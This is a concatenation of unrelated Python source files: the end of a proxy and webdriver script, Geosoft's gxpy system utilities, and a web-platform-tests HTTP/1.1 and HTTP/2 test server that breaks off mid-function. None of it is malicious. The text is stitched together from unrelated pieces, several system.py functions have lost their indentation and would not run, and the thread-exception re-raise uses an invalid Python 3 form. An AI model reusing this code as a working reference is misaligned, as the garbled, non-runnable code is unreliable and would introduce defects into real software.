            raise NoRequestsException
        self.start_server()
        self.proceed()
        self.stop_server()
        self.make_report()
        logging.info('Stopping proxy server and Chrome webdriver...')
        self.proxy.close()
        self.proxy_server.stop()
        self.driver.stop_client()
        self.driver.close()
        logging.info('Proxy server and Chrome webdriver have been closed')
|
system.py | """
Geosoft system functions.
.. note::
Regression tests provide usage examples: `Tests <https://github.com/GeosoftInc/gxpy/blob/master/geosoft/gxpy/tests/test_system.py>`_
"""
import time
import inspect
import os
import gc
import shutil
import zipfile
import threading
import sys
from itertools import count
import geosoft
__version__ = geosoft.__version__
def translate(s):
    """Translate string to user language.

    Currently the identity mapping — returns *s* unchanged.
    """
    return s
def _t(s):
    """Shorthand alias for :func:`translate`."""
    return translate(s)
def _logit(fn, *args, **kw):
"""function console printing decorator"""
def logger(*args, **kw):
ret = fn(*args, **kw)
print('{} called with args({}), kwargs({}); returns({})'.format(fn.__name__, args, kw, ret))
return ret
return logger
def app_name():
    """
    Returns application script name.

    .. versionadded:: 9.1
    """
    script_path = sys.argv[0]
    return os.path.normpath(script_path)
def func_name(stack=0):
    """
    Returns function name.

    :param stack: depth into the calling stack, 0 (default) is this function, 1 is parent, etc.
    :returns: function name, None if too deep into the stack

    .. versionchanged:: 9.2 added stack
    .. versionadded:: 9.1
    """
    try:
        # stack+1 skips this function's own frame; [3] is the frame's
        # function-name slot.
        return inspect.stack()[stack + 1][3]
    except IndexError:
        # Narrowed from a bare except: only an out-of-range stack depth
        # should yield None; anything else (e.g. KeyboardInterrupt) must
        # propagate to the caller.
        return None
def call_location(stack=0):
    """
    Returns function call location including file and line number as a string

    :param stack: depth into the calling stack, 0 (default) is this function, 1 is parent, etc.
    :returns: string formatted as '<file>, line XX in <function>', empty string if too deep into the stack

    .. versionadded:: 9.2
    """
    try:
        # stack+1 skips this function's own frame; slots 1:4 are
        # (filename, line number, function name).
        stack_location = inspect.stack()[stack + 1]
        file, line, func = stack_location[1:4]
        return '{}, line {} in function {}.'.format(file, line, func)
    except IndexError:
        # Narrowed from a bare except (see func_name): only an out-of-range
        # stack depth should yield the empty string.
        return ''
def _parallel_foreach(f, l, threads=3, return_=False):
"""
Apply f to each element of l, in parallel, called by parallel_map().
From: http://wiki.scipy.org/Cookbook/Multithreading
"""
if threads > 1:
iteratorlock = threading.Lock()
exceptions = []
if return_:
n = 0
d = {}
i = zip(count(), l.__iter__())
else:
i = l.__iter__()
def runall():
while True:
iteratorlock.acquire()
try:
try:
if exceptions:
return
v = next(i)
finally:
iteratorlock.release()
except StopIteration:
return
try:
if return_:
n, x = v
d[n] = f(x)
else:
f(v)
except:
e = sys.exc_info()
iteratorlock.acquire()
try:
exceptions.append(e)
finally:
iteratorlock.release()
threadlist = [threading.Thread(target=runall) for j in range(threads)]
for t in threadlist:
t.start()
for t in threadlist:
t.join()
if exceptions:
a, b, c = exceptions[0]
raise (a, b, c)
if return_:
r = sorted(d.items())
return [v for (n, v) in r]
else:
if return_:
return [f(v) for v in l]
else:
for v in l:
f(v)
return
def parallel_map(f, l, threads=None):
    """
    A parallel equivalent of the built-in map() (single iterable only).

    :param f: function to run in parallel f(). Must be thread-safe, of course.
    :param l: iterable list of arguments to pass to each thread. Use tuples for multiple arguments.
    :param threads: number of threads to use, default is number of cores on computer
    :returns: list of results from each call to f(), in order of iterable l.

    :example:

    .. code::

        import gxpy.system as gsys

        # add the two members of each argument tuple, in parallel
        data = [(1 + i, 2 + i) for i in range(20)]
        print(gsys.parallel_map(lambda ab: ab[0] + ab[1], data))
        # prints: [3, 5, 7, 9, 11, 13, 15, 17, 19, 21, 23, 25, 27, 29, 31, 33, 35, 37, 39, 41]

    .. versionadded:: 9.1
    """
    worker_count = os.cpu_count() if threads is None else threads
    return _parallel_foreach(f, l, threads=worker_count, return_=True)
#############
# classes
class GXSysException(geosoft.GXRuntimeError):
    """
    Exceptions raised from :mod:`geosoft.gxpy.system`.

    .. versionadded:: 9.1
    """
def wait_on_file(fileName, wait=100, retries=10):
    """
    Block until a freshly written file becomes accessible.

    Working with large files on systems that cache the file can cause a
    situation where the file is not yet completely written out before an
    attempt is made to open a file that has just been closed. Call this
    right after writing a large file, or in a try/except around an open.

    :param fileName: file to wait for
    :param wait: time in milliseconds to wait between retries
    :param retries: maximum number of retries
    :raises GXSysException: if access to the file cannot be obtained

    .. versionadded:: 9.1
    """
    attempt = 0
    while not os.access(fileName, os.W_OK):
        if attempt >= retries:
            raise GXSysException(_t('Unable to access {}').format(fileName))
        attempt += 1
        time.sleep(wait / 1000.0)
def _unzip(zip_file_name, folder):
with zipfile.ZipFile(zip_file_name) as zf:
zf.extractall(folder)
files = zf.namelist()
return files
def unzip(zip_file_name, folder=None, report=None, checkready=25):
    """
    Decompress and write the content of a zip file to a folder.

    :param zip_file_name: zip file name, must have extension
    :param folder: folder to write results, created if it does not exist;
                   defaults to the zip file's name without its extension
    :param report: ignored
    :param checkready: time in 1/10 second to check completion of each file, default 25
    :returns: (folder that contains unzipped files, list of files)
    :raises GXSysException: if the zip file cannot be processed

    .. versionadded:: 9.1
    """
    # get full path
    zip_file_name = os.path.abspath(zip_file_name)

    # if no folder, determine based on zip file name
    if folder is None:
        folder = os.path.splitext(zip_file_name)[0]

    # create a folder
    if not os.path.exists(folder):
        os.makedirs(folder)

    files = None
    try:
        files = _unzip(zip_file_name, folder)
    except:
        raise GXSysException(_t('Cannot process zip file {}').format(zip_file_name))
    finally:
        # check that files are ready for access
        # NOTE(review): retries=int(checkready * 100) with wait=100 ms allows
        # up to checkready * 10 seconds per file, which does not match the
        # ":param checkready:" wording above — confirm the intended timeout.
        if files and checkready > 0:
            for n in files:
                wait_on_file(os.path.join(folder, n), wait=100, retries=int(checkready * 100))
    return folder, files
def remove_dir(directory, wait=200, tries=10):
    """
    Robust directory removal, with timed retries to allow for OS timing lags. If you need to use this
    you may have a coding error in which you are not properly releasing a resource.

    :param directory: directory name, must be a directory; silently does
                      nothing when the path is not a directory
    :param wait: wait between retries in milliseconds
    :param tries: number of times to retry
    :raises OSError: the last removal error, once *tries* is exhausted

    .. versionadded:: 9.1
    """
    if os.path.isdir(directory):
        t = 0
        while True:
            try:
                shutil.rmtree(directory)
                return
            except OSError:
                # Narrowed from a bare except: rmtree failures are OSError
                # subclasses; anything else (e.g. KeyboardInterrupt) should
                # not be swallowed by the retry loop.
                t += 1
                if t >= tries:
                    raise
                time.sleep(wait / 1000.0)
|
server.py | import errno
import http.server
import os
import socket
from socketserver import ThreadingMixIn
import ssl
import sys
import threading
import time
import traceback
import uuid
from collections import OrderedDict
from queue import Empty, Queue
from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import RequestReceived, ConnectionTerminated, DataReceived, StreamReset, StreamEnded
from h2.exceptions import StreamClosedError, ProtocolError
from h2.settings import SettingCodes
from h2.utilities import extract_method_header
from urllib.parse import urlsplit, urlunsplit
from mod_pywebsocket import dispatch
from mod_pywebsocket.handshake import HandshakeException, AbortedByUserException
from . import routes as default_routes
from .config import ConfigBuilder
from .logger import get_logger
from .request import Server, Request, H2Request
from .response import Response, H2Response
from .router import Router
from .utils import HTTPException, isomorphic_decode, isomorphic_encode
from .constants import h2_headers
from .ws_h2_handshake import WsH2Handshaker
# We need to stress test that browsers can send/receive many headers (there is
# no specified limit), but the Python stdlib has an arbitrary limit of 100
# headers. Hitting the limit leads to HTTP 431, so we monkey patch it higher.
# https://bugs.python.org/issue26586
# https://github.com/web-platform-tests/wpt/pull/24451
import http.client
assert isinstance(getattr(http.client, '_MAXHEADERS'), int)
setattr(http.client, '_MAXHEADERS', 512)
"""
HTTP server designed for testing purposes.
The server is designed to provide flexibility in the way that
requests are handled, and to provide control both of exactly
what bytes are put on the wire for the response, and in the
timing of sending those bytes.
The server is based on the stdlib HTTPServer, but with some
notable differences in the way that requests are processed.
Overall processing is handled by a WebTestRequestHandler,
which is a subclass of BaseHTTPRequestHandler. This is responsible
for parsing the incoming request. A RequestRewriter is then
applied and may change the request data if it matches a
supplied rule.
Once the request data had been finalised, Request and Response
objects are constructed. These are used by the other parts of the
system to read information about the request and manipulate the
response.
Each request is handled by a particular handler function. The
mapping between Request and the appropriate handler is determined
by a Router. By default handlers are installed to interpret files
under the document root with .py extensions as executable python
files (see handlers.py for the api for such files), .asis files as
bytestreams to be sent literally and all other files to be served
statically.
The handler functions are responsible for either populating the
fields of the response object, which will then be written when the
handler returns, or for directly writing to the output stream.
"""
class RequestRewriter(object):
    def __init__(self, rules):
        """Object for rewriting the request path.

        :param rules: Initial rules to add; a list of three item tuples
                      (method, input_path, output_path), defined as for
                      register()
        """
        self.rules = {}
        # Register in reverse so that, on duplicate input paths, the
        # earlier rule in the supplied list wins.
        for rule in reversed(rules):
            self.register(*rule)
        self.logger = get_logger()

    def register(self, methods, input_path, output_path):
        """Register a rewrite rule.

        :param methods: Set of methods this should match. "*" is a
                        special value indicating that all methods should
                        be matched.
        :param input_path: Path to match for the initial request.
        :param output_path: Path to replace the input path with in
                            the request.
        """
        method_list = [methods] if isinstance(methods, (bytes, str)) else methods
        self.rules[input_path] = (method_list, output_path)

    def rewrite(self, request_handler):
        """Rewrite the path in a BaseHTTPRequestHandler instance, if
        it matches a rule.

        :param request_handler: BaseHTTPRequestHandler for which to
                                rewrite the request.
        """
        parts = urlsplit(request_handler.path)
        rule = self.rules.get(parts.path)
        if rule is None:
            return
        methods, destination = rule
        if "*" not in methods and request_handler.command not in methods:
            return
        self.logger.debug("Rewriting request path %s to %s" %
                          (request_handler.path, destination))
        rewritten = list(parts)
        rewritten[2] = destination
        request_handler.path = urlunsplit(rewritten)
class WebTestServer(ThreadingMixIn, http.server.HTTPServer):
    # Allow quick restarts on the same port.
    allow_reuse_address = True
    # Errors treated as a benign remote hang-up in handle_error().
    acceptable_errors = (errno.EPIPE, errno.ECONNABORTED)
    request_queue_size = 2000

    # Ensure that we don't hang on shutdown waiting for requests
    daemon_threads = True

    def __init__(self, server_address, request_handler_cls,
                 router, rewriter, bind_address, ws_doc_root=None,
                 config=None, use_ssl=False, key_file=None, certificate=None,
                 encrypt_after_connect=False, latency=None, http2=False, **kwargs):
        """Server for HTTP(s) Requests

        :param server_address: tuple of (server_name, port)

        :param request_handler_cls: BaseHTTPRequestHandler-like class to use for
                                    handling requests.

        :param router: Router instance to use for matching requests to handler
                       functions

        :param rewriter: RequestRewriter-like instance to use for preprocessing
                         requests before they are routed

        :param config: Dictionary holding environment configuration settings for
                       handlers to read, or None to use the default values.

        :param use_ssl: Boolean indicating whether the server should use SSL

        :param key_file: Path to key file to use if SSL is enabled.

        :param certificate: Path to certificate to use if SSL is enabled.

        :param ws_doc_root: Document root for websockets

        :param encrypt_after_connect: For each connection, don't start encryption
                                      until a CONNECT message has been received.
                                      This enables the server to act as a
                                      self-proxy.

        :param bind_address True to bind the server to both the IP address and
                            port specified in the server_address parameter.
                            False to bind the server only to the port in the
                            server_address parameter, but not to the address.

        :param latency: Delay in ms to wait before serving each response, or
                        callable that returns a delay in ms
        """
        self.router = router
        self.rewriter = rewriter

        self.scheme = "http2" if http2 else "https" if use_ssl else "http"
        self.logger = get_logger()
        self.latency = latency

        # Bind either to (host, port) or, if bind_address is falsy, to the
        # port on all interfaces.
        if bind_address:
            hostname_port = server_address
        else:
            hostname_port = ("",server_address[1])

        http.server.HTTPServer.__init__(self, hostname_port, request_handler_cls, **kwargs)

        # Publish the effective config as class-level state on Server so
        # handlers can read it.
        if config is not None:
            Server.config = config
        else:
            self.logger.debug("Using default configuration")
            with ConfigBuilder(browser_host=server_address[0],
                               ports={"http": [self.server_address[1]]}) as config:
                assert config["ssl_config"] is None
                Server.config = config

        self.ws_doc_root = ws_doc_root
        self.key_file = key_file
        self.certificate = certificate
        self.encrypt_after_connect = use_ssl and encrypt_after_connect

        # Wrap the listening socket in TLS up front unless encryption is
        # deferred until after a CONNECT (self-proxy mode).
        if use_ssl and not encrypt_after_connect:
            if http2:
                # HTTP/2 requires ALPN negotiation of 'h2'.
                ssl_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
                ssl_context.load_cert_chain(keyfile=self.key_file, certfile=self.certificate)
                ssl_context.set_alpn_protocols(['h2'])
                self.socket = ssl_context.wrap_socket(self.socket,
                                                      server_side=True)
            else:
                self.socket = ssl.wrap_socket(self.socket,
                                              keyfile=self.key_file,
                                              certfile=self.certificate,
                                              server_side=True)

    def handle_error(self, request, client_address):
        # Suppress expected client-disconnect errors; log everything else.
        error = sys.exc_info()[1]

        if ((isinstance(error, socket.error) and
             isinstance(error.args, tuple) and
             error.args[0] in self.acceptable_errors) or
            (isinstance(error, IOError) and
             error.errno in self.acceptable_errors)):
            pass  # remote hang up before the result is sent
        else:
            self.logger.error(traceback.format_exc())
class BaseWebTestRequestHandler(http.server.BaseHTTPRequestHandler):
    """RequestHandler for WebTestHttpd"""

    def __init__(self, *args, **kwargs):
        self.logger = get_logger()
        http.server.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)

    def finish_handling_h1(self, request_line_is_valid):
        """Rewrite, route and handle a parsed HTTP/1.x request.

        :param request_line_is_valid: False when the request line was
            over-long; answered with a 414 instead of being routed.
        """
        self.server.rewriter.rewrite(self)

        request = Request(self)
        response = Response(self, request)

        if request.method == "CONNECT":
            self.handle_connect(response)
            return

        if not request_line_is_valid:
            response.set_error(414)
            response.write()
            return

        self.logger.debug("%s %s" % (request.method, request.request_path))
        handler = self.server.router.get_handler(request)
        self.finish_handling(request, response, handler)

    def finish_handling(self, request, response, handler):
        """Invoke *handler* and flush *response*, applying optional latency
        and translating handler exceptions into error responses."""
        # If the handler we used for the request had a non-default base path
        # set update the doc_root of the request to reflect this
        if hasattr(handler, "base_path") and handler.base_path:
            request.doc_root = handler.base_path
        if hasattr(handler, "url_base") and handler.url_base != "/":
            request.url_base = handler.url_base

        # Optional artificial latency (fixed ms value or callable).
        if self.server.latency is not None:
            if callable(self.server.latency):
                latency = self.server.latency()
            else:
                latency = self.server.latency
            self.logger.warning("Latency enabled. Sleeping %i ms" % latency)
            time.sleep(latency / 1000.)

        if handler is None:
            self.logger.debug("No Handler found!")
            response.set_error(404)
        else:
            try:
                handler(request, response)
            except HTTPException as e:
                # Expected, handler-raised status codes.
                response.set_error(e.code, e.message)
            except Exception as e:
                # Anything else becomes a 500 whose body carries the traceback.
                self.respond_with_error(response, e)

        self.logger.debug("%i %s %s (%s) %i" % (response.status[0],
                                                request.method,
                                                request.request_path,
                                                request.headers.get('Referer'),
                                                request.raw_input.length))

        # Flush the response unless the handler already wrote it directly.
        if not response.writer.content_written:
            response.write()

        # If a python handler has been used, the old ones won't send a END_STR data frame, so this
        # allows for backwards compatibility by accounting for these handlers that don't close streams
        if isinstance(response, H2Response) and not response.writer.stream_ended:
            response.writer.end_stream()

        # If we want to remove this in the future, a solution is needed for
        # scripts that produce a non-string iterable of content, since these
        # can't set a Content-Length header. A notable example of this kind of
        # problem is with the trickle pipe i.e. foo.js?pipe=trickle(d1)
        if response.close_connection:
            self.close_connection = True

        if not self.close_connection:
            # Ensure that the whole request has been read from the socket
            request.raw_input.read()

    def handle_connect(self, response):
        """Answer a CONNECT request; when configured, upgrade the connection
        to TLS afterwards (self-proxy mode)."""
        self.logger.debug("Got CONNECT")
        response.status = 200
        response.write()
        if self.server.encrypt_after_connect:
            self.logger.debug("Enabling SSL for connection")
            self.request = ssl.wrap_socket(self.connection,
                                           keyfile=self.server.key_file,
                                           certfile=self.server.certificate,
                                           server_side=True)
            self.setup()
        return

    def respond_with_error(self, response, e):
        """Fill *response* with a 500 whose body is the exception message
        (when non-empty) plus the formatted traceback."""
        message = str(e)
        if message:
            err = [message]
        else:
            err = []
        err.append(traceback.format_exc())
        response.set_error(500, "\n".join(err))
class Http2WebTestRequestHandler(BaseWebTestRequestHandler):
    protocol_version = "HTTP/2.0"

    def handle_one_request(self):
        """
        This is the main HTTP/2.0 Handler.

        When a browser opens a connection to the server
        on the HTTP/2.0 port, the server enters this which will initiate the h2 connection
        and keep running throughout the duration of the interaction, and will read/write directly
        from the socket.

        Because there can be multiple H2 connections active at the same
        time, a UUID is created for each so that it is easier to tell them apart in the logs.
        """
        config = H2Configuration(client_side=False)
        self.conn = H2ConnectionGuard(H2Connection(config=config))
        self.close_connection = False

        # Generate a UUID to make it easier to distinguish different H2 connection debug messages
        self.uid = str(uuid.uuid4())[:8]

        self.logger.debug('(%s) Initiating h2 Connection' % self.uid)

        with self.conn as connection:
            # Bootstrapping WebSockets with HTTP/2 specification requires
            # ENABLE_CONNECT_PROTOCOL to be set in order to enable WebSocket
            # over HTTP/2
            new_settings = dict(connection.local_settings)
            new_settings[SettingCodes.ENABLE_CONNECT_PROTOCOL] = 1
            connection.local_settings.update(new_settings)
            connection.local_settings.acknowledge()

            connection.initiate_connection()
            data = connection.data_to_send()
            window_size = connection.remote_settings.initial_window_size

        self.request.sendall(data)

        # Dict of { stream_id: (thread, queue) }
        stream_queues = {}

        try:
            while not self.close_connection:
                data = self.request.recv(window_size)
                if data == '':
                    self.logger.debug('(%s) Socket Closed' % self.uid)
                    self.close_connection = True
                    continue

                # Parse the received bytes into h2 events under the
                # connection lock.
                with self.conn as connection:
                    frames = connection.receive_data(data)
                    window_size = connection.remote_settings.initial_window_size

                self.logger.debug('(%s) Frames Received: ' % self.uid + str(frames))

                for frame in frames:
                    if isinstance(frame, ConnectionTerminated):
                        self.logger.debug('(%s) Connection terminated by remote peer ' % self.uid)
                        self.close_connection = True

                        # Flood all the streams with connection terminated, this will cause them to stop
                        for stream_id, (thread, queue) in stream_queues.items():
                            queue.put(frame)

                    elif hasattr(frame, 'stream_id'):
                        # Lazily spawn one worker thread + queue per stream,
                        # then forward the frame to that stream's queue.
                        if frame.stream_id not in stream_queues:
                            queue = Queue()
                            stream_queues[frame.stream_id] = (self.start_stream_thread(frame, queue), queue)
                        stream_queues[frame.stream_id][1].put(frame)

                        if isinstance(frame, StreamEnded) or (hasattr(frame, "stream_ended") and frame.stream_ended):
                            del stream_queues[frame.stream_id]

        except (socket.timeout, socket.error) as e:
            self.logger.error('(%s) Closing Connection - \n%s' % (self.uid, str(e)))
            if not self.close_connection:
                self.close_connection = True
        except Exception as e:
            self.logger.error('(%s) Unexpected Error - \n%s' % (self.uid, str(e)))
        finally:
            # Tell every remaining stream thread to stop and wait for it.
            for stream_id, (thread, queue) in stream_queues.items():
                queue.put(None)
                thread.join()

    def _is_extended_connect_frame(self, frame):
        # Extended CONNECT (WebSocket bootstrap over HTTP/2): a CONNECT
        # request carrying a ':protocol: websocket' pseudo-header.
        if not isinstance(frame, RequestReceived):
            return False

        method = extract_method_header(frame.headers)
        if method != b"CONNECT":
            return False

        protocol = ""
        for key, value in frame.headers:
            if key in (b':protocol', u':protocol'):
                protocol = isomorphic_encode(value)
                break
        if protocol != b"websocket":
            raise ProtocolError("Invalid protocol %s with CONNECT METHOD" % (protocol,))

        return True

    def start_stream_thread(self, frame, queue):
        """
        This starts a new thread to handle frames for a specific stream.

        :param frame: The first frame on the stream
        :param queue: A queue object that the thread will use to check for new frames
        :return: The thread object that has already been started
        """
        # WebSocket streams and plain request streams get different workers.
        if self._is_extended_connect_frame(frame):
            target = Http2WebTestRequestHandler._stream_ws_thread
        else:
            target = Http2WebTestRequestHandler._stream_thread
        t = threading.Thread(
            target=target,
            args=(self, frame.stream_id, queue)
        )
        t.start()
        return t

    def _stream_ws_thread(self, stream_id, queue):
        """Per-stream worker for a WebSocket-over-HTTP/2 stream."""
        frame = queue.get(True, None)

        if frame is None:
            return

        # Pipe incoming DATA frames into rfile so the websocket stack can
        # read them like a socket.
        rfile, wfile = os.pipe()
        rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb', 0)  # needs to be unbuffer for websockets
        stream_handler = H2HandlerCopy(self, frame, rfile)

        h2request = H2Request(stream_handler)
        h2response = H2Response(stream_handler, h2request)

        dispatcher = dispatch.Dispatcher(self.server.ws_doc_root, None, False)
        if not dispatcher.get_handler_suite(stream_handler.path):
            h2response.set_error(404)
            h2response.write()
            return

        request_wrapper = _WebSocketRequest(stream_handler, h2response)

        handshaker = WsH2Handshaker(request_wrapper, dispatcher)
        try:
            handshaker.do_handshake()
        except HandshakeException as e:
            self.logger.info('Handshake failed for error: %s' % e)
            h2response.set_error(e.status)
            h2response.write()
            return
        except AbortedByUserException:
            h2response.write()
            return

        # h2 Handshaker prepares the headers but does not send them down the
        # wire. Flush the headers here.
        try:
            h2response.write_status_headers()
        except StreamClosedError:
            # work around https://github.com/web-platform-tests/wpt/issues/27786
            # The stream was already closed.
            return

        request_wrapper._dispatcher = dispatcher

        # we need two threads:
        # - one to handle the frame queue
        # - one to handle the request (dispatcher.transfer_data is blocking)
        # the alternative is to have only one (blocking) thread. That thread
        # will call transfer_data. That would require a special case in
        # handle_one_request, to bypass the queue and write data to wfile
        # directly.
        t = threading.Thread(
            target=Http2WebTestRequestHandler._stream_ws_sub_thread,
            args=(self, request_wrapper, stream_handler, queue)
        )
        t.start()

        while not self.close_connection:
            try:
                frame = queue.get(True, 1)
            except Empty:
                continue

            if isinstance(frame, DataReceived):
                wfile.write(frame.data)
                if frame.stream_ended:
                    raise NotImplementedError("frame.stream_ended")
                    # NOTE(review): unreachable after the raise above; kept
                    # from the original code.
                    wfile.close()
            elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
                self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
                break

        t.join()

    def _stream_ws_sub_thread(self, request, stream_handler, queue):
        """Run the blocking websocket dispatcher, then end the h2 stream and
        signal the parent stream thread via *queue*."""
        dispatcher = request._dispatcher
        try:
            dispatcher.transfer_data(request)
        except StreamClosedError:
            # work around https://github.com/web-platform-tests/wpt/issues/27786
            # The stream was already closed.
            queue.put(None)
            return

        stream_id = stream_handler.h2_stream_id
        with stream_handler.conn as connection:
            try:
                connection.end_stream(stream_id)
                data = connection.data_to_send()
                stream_handler.request.sendall(data)
            except StreamClosedError:  # maybe the stream has already been closed
                pass
        queue.put(None)

    def _stream_thread(self, stream_id, queue):
        """
        This thread processes frames for a specific stream. It waits for frames to be placed
        in the queue, and processes them. When it receives a request frame, it will start processing
        immediately, even if there are data frames to follow. One of the reasons for this is that it
        can detect invalid requests before needing to read the rest of the frames.
        """

        # The file-like pipe object that will be used to share data to request object if data is received
        wfile = None
        request = None
        response = None
        req_handler = None
        while not self.close_connection:
            try:
                frame = queue.get(True, 1)
            except Empty:
                # Restart to check for close_connection
                continue

            self.logger.debug('(%s - %s) %s' % (self.uid, stream_id, str(frame)))

            if isinstance(frame, RequestReceived):
                # Headers arrived: build the per-stream request/response pair
                # and resolve a handler immediately.
                rfile, wfile = os.pipe()
                rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb')

                stream_handler = H2HandlerCopy(self, frame, rfile)

                stream_handler.server.rewriter.rewrite(stream_handler)
                request = H2Request(stream_handler)
                response = H2Response(stream_handler, request)

                req_handler = stream_handler.server.router.get_handler(request)

                if hasattr(req_handler, "frame_handler"):
                    # Convert this to a handler that will utilise H2 specific functionality, such as handling individual frames
                    req_handler = self.frame_handler(request, response, req_handler)

                if hasattr(req_handler, 'handle_headers'):
                    req_handler.handle_headers(frame, request, response)

            elif isinstance(frame, DataReceived):
                # Body bytes: forward into the request's pipe.
                wfile.write(frame.data)

                if hasattr(req_handler, 'handle_data'):
                    req_handler.handle_data(frame, request, response)

                if frame.stream_ended:
                    wfile.close()
            elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
                self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
                break

            if request is not None:
                request.frames.append(frame)

            # Once the stream has ended, dispatch the full request.
            if hasattr(frame, "stream_ended") and frame.stream_ended:
                try:
                    self.finish_handling(request, response, req_handler)
                except StreamClosedError:
                    self.logger.debug('(%s - %s) Unable to write response; stream closed' %
                                      (self.uid, stream_id))
                    break

    def frame_handler(self, request, response, handler):
        """Instantiate a frame-level handler; on failure write the error
        response immediately and return None."""
        try:
            return handler.frame_handler(request)
        except HTTPException as e:
            response.set_error(e.code, e.message)
            response.write()
        except Exception as e:
            self.respond_with_error(response, e)
            response.write()
class H2ConnectionGuard(object):
    """Serialize access to a shared H2Connection, which is not threadsafe.

    Usage: ``with guard as conn: ...`` — a single class-wide lock is held
    for the duration of the block, and the wrapped connection is returned.
    """
    lock = threading.Lock()

    def __init__(self, obj):
        assert isinstance(obj, H2Connection)
        self.obj = obj

    def __enter__(self):
        # Acquire the shared lock, then expose the raw connection.
        self.lock.acquire()
        return self.obj

    def __exit__(self, exception_type, exception_value, traceback):
        # Release unconditionally, even when the block raised.
        self.lock.release()
class H2Headers(dict):
    """Dict of decoded H2 request headers keyed by HTTP/1-style names.

    Known pseudo-headers (e.g. ``:method``) are exposed without the leading
    colon; the raw decoded pairs are kept, in order, in ``raw_headers``.
    """
    def __init__(self, headers):
        self.raw_headers = OrderedDict()
        for raw_key, raw_val in headers:
            decoded_key = isomorphic_decode(raw_key)
            decoded_val = isomorphic_decode(raw_val)
            self.raw_headers[decoded_key] = decoded_val
            dict.__setitem__(self, self._convert_h2_header_to_h1(decoded_key), decoded_val)

    def _convert_h2_header_to_h1(self, header_key):
        # Strip the leading ':' only for recognised h2 pseudo-headers.
        is_pseudo = header_key.startswith(':') and header_key[1:] in h2_headers
        return header_key[1:] if is_pseudo else header_key

    # TODO This does not seem relevant for H2 headers, so using a dummy function for now
    def getallmatchingheaders(self, header):
        return ['dummy function']
class H2HandlerCopy(object):
    """Per-stream snapshot of a request handler.

    Copies just enough state from the connection-level handler, plus the
    stream's request frame, for Request/Response objects to operate on a
    single H2 stream.
    """
    def __init__(self, handler, req_frame, rfile):
        # Stream-specific state derived from the request frame.
        self.headers = H2Headers(req_frame.headers)
        self.command = self.headers['method']
        self.path = self.headers['path']
        self.h2_stream_id = req_frame.stream_id
        self.rfile = rfile
        self.raw_requestline = ''
        # Connection-level state borrowed from the parent handler.
        self.server = handler.server
        self.protocol_version = handler.protocol_version
        self.client_address = handler.client_address
        self.request = handler.request
        self.conn = handler.conn
class Http1WebTestRequestHandler(BaseWebTestRequestHandler):
    protocol_version = "HTTP/1.1"

    def handle_one_request(self):
        """Read, parse and dispatch a single HTTP/1.1 request."""
        response = None

        try:
            self.close_connection = False

            request_line_is_valid = self.get_request_line()

            if self.close_connection:
                return

            request_is_valid = self.parse_request()
            if not request_is_valid:
                #parse_request() actually sends its own error responses
                return

            self.finish_handling_h1(request_line_is_valid)

        except socket.timeout as e:
            self.log_error("Request timed out: %r", e)
            self.close_connection = True
            return

        except Exception:
            err = traceback.format_exc()
            # NOTE(review): `response` is never reassigned above, so it is
            # always None here and the 500 below is never written — looks
            # like a latent bug; confirm against upstream history.
            if response:
                response.set_error(500, err)
                response.write()
            self.logger.error(err)

    def get_request_line(self):
        """Read the raw request line (limit 64K).

        :returns: False on socket error or when the line exceeds 65536
            bytes (the caller answers 414); True otherwise. Sets
            close_connection on EOF or socket error.
        """
        try:
            self.raw_requestline = self.rfile.readline(65537)
        except socket.error:
            self.close_connection = True
            return False
        if len(self.raw_requestline) > 65536:
            # Over-long request line: clear parsed fields and report invalid.
            self.requestline = ''
            self.request_version = ''
            self.command = ''
            return False
        if not self.raw_requestline:
            # EOF: peer closed the connection.
            self.close_connection = True
        return True
class WebTestHttpd(object):
    """
    :param host: Host from which to serve (default: 127.0.0.1)
    :param port: Port from which to serve (default: 8000)
    :param server_cls: Class to use for the server (default depends on ssl vs non-ssl)
    :param handler_cls: Class to use for the RequestHandler
    :param use_ssl: Use a SSL server if no explicit server_cls is supplied
    :param key_file: Path to key file to use if ssl is enabled
    :param certificate: Path to certificate file to use if ssl is enabled
    :param encrypt_after_connect: For each connection, don't start encryption
                                  until a CONNECT message has been received.
                                  This enables the server to act as a
                                  self-proxy.
    :param router_cls: Router class to use when matching URLs to handlers
    :param doc_root: Document root for serving files
    :param ws_doc_root: Document root for websockets
    :param routes: List of routes with which to initialize the router
    :param rewriter_cls: Class to use for request rewriter
    :param rewrites: List of rewrites with which to initialize the rewriter_cls
    :param config: Dictionary holding environment configuration settings for
                   handlers to read, or None to use the default values.
    :param bind_address: Boolean indicating whether to bind server to IP address.
    :param latency: Delay in ms to wait before serving each response, or
                    callable that returns a delay in ms

    HTTP server designed for testing scenarios.

    Takes a router class which provides one method get_handler which takes a Request
    and returns a handler function.

    .. attribute:: host

      The host name or ip address of the server

    .. attribute:: port

      The port on which the server is running

    .. attribute:: router

      The Router object used to associate requests with resources for this server

    .. attribute:: rewriter

      The Rewriter object used for URL rewriting

    .. attribute:: use_ssl

      Boolean indicating whether the server is using ssl

    .. attribute:: started

      Boolean indicating whether the server is running

    """
    def __init__(self, host="127.0.0.1", port=8000,
                 server_cls=None, handler_cls=Http1WebTestRequestHandler,
                 use_ssl=False, key_file=None, certificate=None, encrypt_after_connect=False,
                 router_cls=Router, doc_root=os.curdir, ws_doc_root=None, routes=None,
                 rewriter_cls=RequestRewriter, bind_address=True, rewrites=None,
                 latency=None, config=None, http2=False):
        if routes is None:
            routes = default_routes.routes

        self.host = host

        self.router = router_cls(doc_root, routes)
        self.rewriter = rewriter_cls(rewrites if rewrites is not None else [])

        self.use_ssl = use_ssl
        self.http2 = http2
        self.logger = get_logger()

        if server_cls is None:
            server_cls = WebTestServer

        if use_ssl:
            # Fail early, and with an accurate message for whichever file is
            # actually missing (the original messages were swapped: a missing
            # key file was reported as a missing certificate and vice versa).
            if not os.path.exists(key_file):
                raise ValueError("SSL key file not found: {}".format(key_file))
            if not os.path.exists(certificate):
                raise ValueError("SSL certificate not found: {}".format(certificate))

        try:
